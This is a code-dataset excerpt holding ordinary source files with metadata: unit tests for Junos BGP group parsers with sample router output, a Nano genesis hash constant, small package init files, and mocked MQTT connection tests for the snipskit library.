Name: v6_sggjbb001 Index: 9 Flags: <Export Eval>
Export: [ (ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:5961:ca45::1
Group Type: External Local AS: 65171
Name: sjkGCS001-EC11 Index: 10 Flags: <Export Eval>
Export: [ ((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
10.169.14.240+60606
Route Queue Timer: unset Route Queue: empty
Table inet.0
Active prefixes: 682
Received prefixes: 684
Accepted prefixes: 684
Suppressed due to damping: 0
Advertised prefixes: 0
Table inet.3
Active prefixes: 2
Received prefixes: 2
Accepted prefixes: 2
Suppressed due to damping: 0
Advertised prefixes: 0
Group Type: External Local AS: 65171
Name: v6_sjkGCS001-EC11 Index: 11 Flags: <Export Eval>
Export: [ (v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 1
2001:db8:eb18:ca45::1+179
Route Queue Timer: unset Route Queue: empty
Table inet6.0
Active prefixes: 0
Received prefixes: 0
Accepted prefixes: 0
Suppressed due to damping: 0
Advertised prefixes: 0
Group Type: External Local AS: 65171
Name: obpGCS001-WC11 Index: 12 Flags: <Export Eval>
Export: [ (HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
10.169.14.249
Group Type: External Local AS: 65171
Name: v6_obpGCS001-WC11 Index: 13 Flags: <Export Eval>
Export: [ (v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED)) ]
Options: <Multihop Confed>
Options: <GracefulShutdownRcv>
Holdtime: 0
Graceful Shutdown Receiver local-preference: 0
Total peers: 1 Established: 0
2001:db8:eb18:ca45::11
Groups: 14 Peers: 19 External: 6 Internal: 13 Down peers: 15 Flaps: 359
Table inet.0
Received prefixes: 1366
Accepted prefixes: 1366
Active prefixes: 682
Suppressed due to damping: 0
Received external prefixes: 684
Active external prefixes: 682
Externals suppressed: 0
Received internal prefixes: 682
Active internal prefixes: 0
Internals suppressed: 0
RIB State: BGP restart is complete
Table inet.3
Received prefixes: 2
Accepted prefixes: 2
Active prefixes: 2
Suppressed due to damping: 0
Received external prefixes: 2
Active external prefixes: 2
Externals suppressed: 0
Received internal prefixes: 0
Active internal prefixes: 0
Internals suppressed: 0
RIB State: BGP restart is complete
Table inet6.0
Received prefixes: 0
Accepted prefixes: 0
Active prefixes: 0
Suppressed due to damping: 0
Received external prefixes: 0
Active external prefixes: 0
Externals suppressed: 0
Received internal prefixes: 0
Active internal prefixes: 0
Internals suppressed: 0
RIB State: BGP restart is complete
'''}
golden_parsed_output = {
"bgp-group-information": {
"bgp-group": [
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v4_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "682",
"active-prefix-count": "0",
"advertised-prefix-count": "682",
"name": "inet.0",
"received-prefix-count": "682",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "0",
"local-as": "65171",
"name": "Genie",
"peer-address": [
"10.189.5.253+179"
],
"peer-as": "65171",
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_WATARI && NEXT-HOP-SELF)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "1",
"local-as": "65171",
"name": "v6_Genie",
"peer-address": [
"2001:db8:223c:ca45::c+60268"
],
"peer-as": "65171",
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v4_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "2",
"local-as": "65171",
"name": "v4_RRC_72_TRIANGLE",
"peer-address": [
"10.189.5.245",
"10.189.5.243",
"10.189.5.242+179"
],
"peer-as": "65171",
"peer-count": "3",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && v6_NEXT-HOP-SELF_hktGCS001)",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "3",
"local-as": "65171",
"name": "v6_RRC_72_TRIANGLE",
"peer-address": [
"2001:db8:223c:ca45::7+179",
"2001:db8:223c:ca45::8+179"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "4",
"local-as": "65171",
"name": "v6_RRC_72_SQUARE",
"peer-address": [
"2001:db8:223c:ca45::9",
"2001:db8:223c:ca45::a+179"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "ALL_out",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "5",
"local-as": "65171",
"name": "v4_RRC_72_SQUARE",
"peer-address": [
"10.189.5.241+179",
"10.189.5.240"
],
"peer-as": "65171",
"peer-count": "2",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v4_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "6",
"local-as": "65171",
"name": "v4_Kentik",
"peer-address": [
"10.49.216.179"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Cluster Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "v6_Kentik_NO-DEFAULT",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "7",
"local-as": "65171",
"name": "v6_Kentik",
"peer-address": [
"2001:db8:6be:89bb::1:140"
],
"peer-as": "65171",
"peer-count": "1",
"type": "Internal"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "8",
"local-as": "65171",
"name": "sggjbb001",
"peer-address": [
"10.189.6.250"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(ALL_out && (NEXT-HOP-SELF && v6_HKG-SNG_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "9",
"local-as": "65171",
"name": "v6_sggjbb001",
"peer-address": [
"2001:db8:5961:ca45::1"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "((LABELSTACK_O2B || HKG-EC_out) && (NEXT-HOP-SELF && HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "684",
"active-prefix-count": "682",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "684",
"suppressed-prefix-count": "0"
},
{
"accepted-prefix-count": "2",
"active-prefix-count": "2",
"advertised-prefix-count": "0",
"name": "inet.3",
"received-prefix-count": "2",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "10",
"local-as": "65171",
"name": "sjkGCS001-EC11",
"peer-address": [
"10.169.14.240+60606"
],
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-EC_out && (NEXT-HOP-SELF && v6_HKG-EC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-prefix-count": "0"
}
],
"established-count": "1",
"group-flags": "Export Eval",
"group-index": "11",
"local-as": "65171",
"name": "v6_sjkGCS001-EC11",
"peer-address": [
"2001:db8:eb18:ca45::1+179"
],
"peer-count": "1",
"route-queue": {
"state": "empty",
"timer": "unset"
},
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(HKG-WC_out && (NEXT-HOP-SELF && HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "12",
"local-as": "65171",
"name": "obpGCS001-WC11",
"peer-address": [
"10.169.14.249"
],
"peer-count": "1",
"type": "External"
},
{
"bgp-option-information": {
"bgp-options": "Multihop Confed",
"bgp-options-extended": "GracefulShutdownRcv",
"export-policy": "(v6_HKG-WC_out && (NEXT-HOP-SELF && v6_HKG-WC_AddMED))",
"gshut-recv-local-preference": "0",
"holdtime": "0"
},
"established-count": "0",
"group-flags": "Export Eval",
"group-index": "13",
"local-as": "65171",
"name": "v6_obpGCS001-WC11",
"peer-address": [
"2001:db8:eb18:ca45::11"
],
"peer-count": "1",
"type": "External"
}
],
"bgp-information": {
"bgp-rib": [
{
"accepted-prefix-count": "1366",
"active-external-prefix-count": "682",
"active-internal-prefix-count": "0",
"active-prefix-count": "682",
"bgp-rib-state": "BGP restart is complete",
"name": "inet.0",
"received-prefix-count": "1366",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "684",
"total-internal-prefix-count": "682"
},
{
"accepted-prefix-count": "2",
"active-external-prefix-count": "2",
"active-internal-prefix-count": "0",
"active-prefix-count": "2",
"bgp-rib-state": "BGP restart is complete",
"name": "inet.3",
"received-prefix-count": "2",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "2",
"total-internal-prefix-count": "0"
},
{
"accepted-prefix-count": "0",
"active-external-prefix-count": "0",
"active-internal-prefix-count": "0",
"active-prefix-count": "0",
"bgp-rib-state": "BGP restart is complete",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "0",
"total-internal-prefix-count": "0"
}
],
"down-peer-count": "15",
"external-peer-count": "6",
"flap-count": "359",
"group-count": "14",
"internal-peer-count": "13",
"peer-count": "19"
}
}
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowBgpGroupDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowBgpGroupDetail(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
class TestShowBgpGroupSummary(unittest.TestCase):
""" Unit tests for:
* show bgp group summary | no-more
"""
maxDiff = None
device = Device(name='aDevice')
empty_output = {'execute.return_value': ''}
# show bgp group summary | no-more
golden_output = {'execute.return_value': '''
Group Type Peers Established Active/Received/Accepted/Damped
hktGCS002 Internal 1 1
inet.0 : 0/682/682/0
v6_hktGCS002 Internal 1 1
inet6.0 : 0/0/0/0
v4_RRC_72_TRIANGLE Internal 3 0
v6_RRC_72_TRIANGLE Internal 2 0
v6_RRC_72_SQUARE Internal 2 0
v4_RRC_72_SQUARE Internal 2 0
v4_Kentik Internal 1 0
v6_Kentik Internal 1 0
sggjbb001 External 1 0
v6_sggjbb001 External 1 0
sjkGCS001-EC11 External 1 1
inet.0 : 682/684/684/0
inet.3 : 2/2/2/0
v6_sjkGCS001-EC11 External 1 1
inet6.0 : 0/0/0/0
obpGCS001-WC11 External 1 0
v6_obpGCS001-WC11 External 1 0
Groups: 14 Peers: 19 External: 6 Internal: 13 Down peers: 15 Flaps: 359
inet.0 : 682/1366/1366/0 External: 682/684/684/0 Internal: 0/682/682/0
inet.3 : 2/2/2/0 External: 2/2/2/0 Internal: 0/0/0/0
inet6.0 : 0/0/0/0 External: 0/0/0/0 Internal: 0/0/0/0
'''}
golden_parsed_output = {
"bgp-group-information": {
"bgp-group": [
{
"bgp-rib": [
{
"accepted-prefix-count": "682",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "682",
}
],
"established-count": "1",
"name": "hktGCS002",
"peer-count": "1",
"type": "Internal",
},
{
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
}
],
"established-count": "1",
"name": "v6_hktGCS002",
"peer-count": "1",
"type": "Internal",
},
{
"established-count": "0",
"name": "v4_RRC_72_TRIANGLE",
"peer-count": "3",
"type": "Internal",
},
{
"established-count": "0",
"name": "v6_RRC_72_TRIANGLE",
"peer-count": "2",
"type": "Internal",
},
{
"established-count": "0",
"name": "v6_RRC_72_SQUARE",
"peer-count": "2",
"type": "Internal",
},
{
"established-count": "0",
"name": "v4_RRC_72_SQUARE",
"peer-count": "2",
"type": "Internal",
},
{
"established-count": "0",
"name": "v4_Kentik",
"peer-count": "1",
"type": "Internal",
},
{
"established-count": "0",
"name": "v6_Kentik",
"peer-count": "1",
"type": "Internal",
},
{
"established-count": "0",
"name": "sggjbb001",
"peer-count": "1",
"type": "External",
},
{
"established-count": "0",
"name": "v6_sggjbb001",
"peer-count": "1",
"type": "External",
},
{
"bgp-rib": [
{
"accepted-prefix-count": "684",
"active-prefix-count": "682",
"advertised-prefix-count": "0",
"name": "inet.0",
"received-prefix-count": "684",
},
{
"accepted-prefix-count": "2",
"active-prefix-count": "2",
"advertised-prefix-count": "0",
"name": "inet.3",
"received-prefix-count": "2",
},
],
"established-count": "1",
"name": "sjkGCS001-EC11",
"peer-count": "1",
"type": "External",
},
{
"bgp-rib": [
{
"accepted-prefix-count": "0",
"active-prefix-count": "0",
"advertised-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
}
],
"established-count": "1",
"name": "v6_sjkGCS001-EC11",
"peer-count": "1",
"type": "External",
},
{
"established-count": "0",
"name": "obpGCS001-WC11",
"peer-count": "1",
"type": "External",
},
{
"established-count": "0",
"name": "v6_obpGCS001-WC11",
"peer-count": "1",
"type": "External",
},
],
"bgp-information": {
"bgp-rib": [
{
"accepted-external-prefix-count": "684",
"accepted-internal-prefix-count": "682",
"accepted-prefix-count": "1366",
"active-external-prefix-count": "682",
"active-internal-prefix-count": "0",
"active-prefix-count": "682",
"name": "inet.0",
"received-prefix-count": "1366",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "684",
"total-internal-prefix-count": "682",
},
{
"accepted-external-prefix-count": "2",
"accepted-internal-prefix-count": "0",
"accepted-prefix-count": "2",
"active-external-prefix-count": "2",
"active-internal-prefix-count": "0",
"active-prefix-count": "2",
"name": "inet.3",
"received-prefix-count": "2",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "2",
"total-internal-prefix-count": "0",
},
{
"accepted-external-prefix-count": "0",
"accepted-internal-prefix-count": "0",
"accepted-prefix-count": "0",
"active-external-prefix-count": "0",
"active-internal-prefix-count": "0",
"active-prefix-count": "0",
"name": "inet6.0",
"received-prefix-count": "0",
"suppressed-external-prefix-count": "0",
"suppressed-internal-prefix-count": "0",
"suppressed-prefix-count": "0",
"total-external-prefix-count": "0",
"total-internal-prefix-count": "0",
},
],
"down-peer-count": "15",
"external-peer-count": "6",
"flap-count": "359",
"group-count": "14",
"internal-peer-count": "13",
"peer-count": "19",
},
},
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowBgpGroupSummary(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowBgpGroupSummary(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
| 41.984859
| 112
| 0.391892
| 4,845
| 61,004
| 4.874923
| 0.04128
| 0.069393
| 0.048266
| 0.037936
| 0.953554
| 0.949151
| 0.932004
| 0.919345
| 0.901393
| 0.888183
| 0
| 0.083908
| 0.491673
| 61,004
| 1,452
| 113
| 42.013774
| 0.677749
| 0.003623
| 0
| 0.814038
| 0
| 0.003618
| 0.528777
| 0.096972
| 0
| 0
| 0
| 0
| 0.004342
| 1
| 0.004342
| false
| 0
| 0.004342
| 0
| 0.021708
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f7b6b49a78e0c420431267b8e0868e805d4e6f9
| 105
|
py
|
Python
|
daceml/transformation/__init__.py
|
manuelburger/daceml
|
501a05b0531bcf208b43816eeaba998feb83feb5
|
[
"BSD-3-Clause"
] | null | null | null |
daceml/transformation/__init__.py
|
manuelburger/daceml
|
501a05b0531bcf208b43816eeaba998feb83feb5
|
[
"BSD-3-Clause"
] | null | null | null |
daceml/transformation/__init__.py
|
manuelburger/daceml
|
501a05b0531bcf208b43816eeaba998feb83feb5
|
[
"BSD-3-Clause"
] | null | null | null |
from .constant_folding import ConstantFolding
from .parameter_to_transient import parameter_to_transient
| 35
| 58
| 0.904762
| 13
| 105
| 6.923077
| 0.615385
| 0.244444
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07619
| 105
| 2
| 59
| 52.5
| 0.927835
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f81bbe6120825b64ad91b7ec7594077da504f4d
| 110
|
py
|
Python
|
nano/blocks.py
|
bbedward/nano-python
|
a996bf5af57ece64c8389fc0b54bafecf045c5f4
|
[
"MIT"
] | null | null | null |
nano/blocks.py
|
bbedward/nano-python
|
a996bf5af57ece64c8389fc0b54bafecf045c5f4
|
[
"MIT"
] | null | null | null |
nano/blocks.py
|
bbedward/nano-python
|
a996bf5af57ece64c8389fc0b54bafecf045c5f4
|
[
"MIT"
] | 1
|
2021-09-12T12:32:14.000Z
|
2021-09-12T12:32:14.000Z
|
#: Genesis block hash
GENESIS_BLOCK_HASH = '991CF190094C00F0B68E2E5F75F6BEE95A2E0BD93CEAA4A6734DB9F19B728948'
| 36.666667
| 87
| 0.890909
| 7
| 110
| 13.714286
| 0.571429
| 0.25
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.378641
| 0.063636
| 110
| 2
| 88
| 55
| 0.553398
| 0.181818
| 0
| 0
| 0
| 0
| 0.719101
| 0.719101
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3f8506783d2c1317b41cd456d09713df8b733c7d
| 114
|
py
|
Python
|
tests/__init__.py
|
tinker-coin/tinker-coin
|
3d599f642f4f49d30ba9bc58316a502e8a325e85
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tinker-coin/tinker-coin
|
3d599f642f4f49d30ba9bc58316a502e8a325e85
|
[
"MIT"
] | null | null | null |
tests/__init__.py
|
tinker-coin/tinker-coin
|
3d599f642f4f49d30ba9bc58316a502e8a325e85
|
[
"MIT"
] | null | null | null |
import os, sys
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'node'))
| 38
| 98
| 0.745614
| 20
| 114
| 4.05
| 0.5
| 0.296296
| 0.320988
| 0.37037
| 0.395062
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04386
| 114
| 2
| 99
| 57
| 0.743119
| 0
| 0
| 0
| 0
| 0
| 0.035088
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3f9ec282ed4547f2862e2f1365aea29123eb3226
| 6,410
|
py
|
Python
|
tests/mqtt/test_components_mqtt_connection.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 12
|
2019-03-18T13:03:46.000Z
|
2019-08-14T03:13:32.000Z
|
tests/mqtt/test_components_mqtt_connection.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-04-05T07:14:59.000Z
|
2019-12-06T23:51:31.000Z
|
tests/mqtt/test_components_mqtt_connection.py
|
fossabot/snipskit
|
57fe329bf302f863bf190b2cfe1175e13d1d017e
|
[
"MIT"
] | 4
|
2019-05-01T07:56:20.000Z
|
2019-11-17T13:54:59.000Z
|
"""Tests for the `snipskit.components.MQTTSnipsComponent` class."""
from snipskit.mqtt.components import MQTTSnipsComponent
from snipskit.config import SnipsConfig
class SimpleMQTTComponent(MQTTSnipsComponent):
"""A simple Snips component using MQTT directly to test."""
def initialize(self):
pass
def test_snips_component_mqtt_connection_default(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with the default MQTT
connection settings connects to the MQTT broker correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
component = SimpleMQTTComponent()
# Check configuration
assert component.snips.mqtt.broker_address == 'localhost:1883'
# Check MQTT connection
assert component.mqtt.username_pw_set.call_count == 0
assert component.mqtt.tls_set.call_count == 0
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('localhost', 1883, 60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
def test_snips_component_mqtt_with_snips_config(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with a `SnipsConfig` object
passed to `__init__` uses the connection settings from the specified file.
"""
config_file = 'snips.toml'
fs.create_file(config_file, contents='[snips-common]\n'
'mqtt = "mqtt.example.com:1883"\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
snips_config = SnipsConfig(config_file)
component = SimpleMQTTComponent(snips_config)
# Check configuration
assert component.snips == snips_config
assert component.snips.mqtt.broker_address == 'mqtt.example.com:1883'
# Check MQTT connection
assert component.mqtt.username_pw_set.call_count == 0
assert component.mqtt.tls_set.call_count == 0
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('mqtt.example.com', 1883,
60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
def test_snips_component_mqtt_connection_with_authentication(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with MQTT authentication
connects to the MQTT broker correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file, contents='[snips-common]\n'
'mqtt = "mqtt.example.com:8883"\n'
'mqtt_username = "foobar"\n'
'mqtt_password = "secretpassword"\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
component = SimpleMQTTComponent()
# Check configuration
assert component.snips.mqtt.broker_address == 'mqtt.example.com:8883'
assert component.snips.mqtt.auth.username == 'foobar'
assert component.snips.mqtt.auth.password == 'secretpassword'
# Check MQTT connection
component.mqtt.username_pw_set.assert_called_once_with('foobar',
'secretpassword')
assert component.mqtt.tls_set.call_count == 0
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('mqtt.example.com', 8883,
60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
def test_snips_component_mqtt_connection_with_tls_and_authentication(fs, mocker):
"""Test whether a `MQTTSnipsComponent` object with TLS and MQTT
authentication connects to the MQTT broker correctly.
"""
config_file = '/etc/snips.toml'
fs.create_file(config_file,
contents='[snips-common]\n'
'mqtt = "mqtt.example.com:4883"\n'
'mqtt_username = "foobar"\n'
'mqtt_password = "secretpassword"\n'
'mqtt_tls_hostname="mqtt.example.com"\n'
'mqtt_tls_cafile="/etc/ssl/certs/ca-certificates.crt"\n')
mocker.patch('paho.mqtt.client.Client.connect')
mocker.patch('paho.mqtt.client.Client.loop_forever')
mocker.patch('paho.mqtt.client.Client.tls_set')
mocker.patch('paho.mqtt.client.Client.username_pw_set')
mocker.patch.object(SimpleMQTTComponent, 'initialize')
component = SimpleMQTTComponent()
# Check configuration
assert component.snips.mqtt.broker_address == 'mqtt.example.com:4883'
assert component.snips.mqtt.auth.username == 'foobar'
assert component.snips.mqtt.auth.password == 'secretpassword'
assert component.snips.mqtt.tls.hostname == 'mqtt.example.com'
assert component.snips.mqtt.tls.ca_file == '/etc/ssl/certs/ca-certificates.crt'
# Check MQTT connection
component.mqtt.username_pw_set.assert_called_once_with('foobar',
'secretpassword')
component.mqtt.tls_set.assert_called_once_with(ca_certs='/etc/ssl/certs/ca-certificates.crt',
certfile=None,
keyfile=None)
assert component.mqtt.loop_forever.call_count == 1
component.mqtt.connect.assert_called_once_with('mqtt.example.com', 4883,
60, '')
# Check whether `initialize()` method is called.
assert component.initialize.call_count == 1
| 41.895425
| 97
| 0.663651
| 734
| 6,410
| 5.625341
| 0.125341
| 0.087188
| 0.058125
| 0.073626
| 0.85735
| 0.831194
| 0.788326
| 0.788326
| 0.765076
| 0.70017
| 0
| 0.01315
| 0.228861
| 6,410
| 152
| 98
| 42.171053
| 0.822173
| 0.15039
| 0
| 0.6
| 0
| 0
| 0.244598
| 0.157601
| 0
| 0
| 0
| 0
| 0.344444
| 1
| 0.055556
| false
| 0.077778
| 0.022222
| 0
| 0.088889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3fa6382fbfb25f246d7abe67f96cb8764bc4d846
| 4,964
|
py
|
Python
|
functions.py
|
daleshingles/TheDon
|
756fe1904e640e1e6b314eb652e2643dd1e59ec8
|
[
"MIT"
] | 3
|
2019-05-30T19:36:59.000Z
|
2020-10-10T16:22:05.000Z
|
functions.py
|
daleshingles/TheDon
|
756fe1904e640e1e6b314eb652e2643dd1e59ec8
|
[
"MIT"
] | 1
|
2019-06-05T18:54:50.000Z
|
